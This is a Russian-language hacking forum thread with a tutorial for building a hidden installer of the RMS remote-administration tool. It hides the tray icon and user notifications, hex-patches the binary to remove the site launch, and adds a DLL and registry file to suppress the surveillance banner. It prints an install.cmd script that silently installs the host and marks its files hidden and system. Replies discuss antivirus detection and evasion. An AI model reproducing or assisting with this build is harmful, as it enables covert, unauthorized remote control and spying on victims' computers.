Скачиваем последнюю версию RMS 5.5 с официального сайта, запускаем вьювер выбираем меню Инструменты, MSI конфигуратор, открываем файл RMS хоста. Выбираем дистрибутив "One Click" отмечаем генерировать новый id при отправке на почту, вводим свое мыло, ставим отключить создание ярлыков, не запрашивать подтверждения и т.д. Нажимаем Конфигурировать, отключаем: оповещение пользователя, иконку в трее, вобщем все по старой схеме.Полученный RMS.exe открываем в WinHex и нажимаем ctrl+F, вводим туда эту строчку: RunProgram="forcenowait:http://rmansys.ru/" и нажимаем поиск, найденную строчку забиваем пробелами, внимательно чтобы не удалить лишние символы.После этого сохраняем RMS.exe. Этими действиями мы убрали открытие сайта rmansys.ru при запуске RMS.exeДалее открываем RMS.exe 7-zip ом и добавляем туда файлы: winmm.dll и 28.reg. После этого извлекаем файл install.cmd, открываем его блокнотом и удаляем все, вместо этого копируем туда этот код Код: :mad:chcp 1251mkdir "%ProgramFiles%\Remote Manipulator System - Host"copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress@MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress@ping 127.0.0.1@MsiExec /I "rms.host5.5ru.msi" /qn@ping 127.0.0.1regedit /s 28.reg@attrib +h +s +r "%programfiles%\Remote Manipulator System - Host"@attrib +h +s +r "%ProgramFiles(x86)%\Remote Manipulator System - Host"@attrib +h +s +r /d /s "%programfiles%\Remote Manipulator System - Host\*.*"@attrib +h +s +r /d /s "%ProgramFiles(x86)%\Remote Manipulator System - Host\*.*" Сохраняем новый install.cmd и упаковываем обратно. Все RMS.exe готов-полностью скрытый-убран баннер о видеонаблюдении-отправка id на почту-не убиваем в процессах-из главных 5-и АВ пока палица только Авирой, она палит winmm.dll (ну и проактивками)ЗАПУСКАЕМ НА ВИРТУАЛКЕСборку сделал grs101 Hidden Content: **Hidden Content: To see this hidden content your post count must be 2 or greater.**
Простите за глупый вопрос: а где брать файлы winmm.dll и 28.reg и где чистить реестр после неоднократных установок.
Согласен на 100%. Еще бы чуток информации для тех кто в начале пути. Тогда и 200 мало будет.:-[ Добавлено через 3 минуты Без winmm.dll и 28.reg все работает при открытой установке (невзирая на ругань каспера), но какие может это повлечь глюки?
Уважаемый Админ могу тогда выложить новую инфу по новой версии RMS 5.6 её я ещё ни где не находил :-[
Конечно выкладывайте, у нас есть специальный раздел для этого: http://www.xaker.name/forvb/forumdisplay.php?f=174
Табличка с запросом на отправку email выходит чую под хайдом что-то интересное но "репутация" что-то подводит
привет всем антивирусами уже палится ,можно узнать файл winmm.dll можно удалить после послания ид на меил? тогда ведь антивирусами палится не будет да? мне это нужно для WPI спасибо заранее
привет всем люди создал обычный инсталятор через рмс вивер, в скрытом режиме ,но никаких баннеров не выбивал мне кто подскажет в версии 5.6 эту функцию убрали? и можете сказать после установки такой версии антивирусы его будут палить как вирус?
Ничего не убрали. Скорее всего в Цэ\Програм филес завалялась winmm.dll При деинсталляции рмс она не удаляется.
просмотрел нету файла,но я никаких дополнений не делал,а просто создал инсталяшку и все и да было предупреждение о инсталяции рмс но баннер не появляется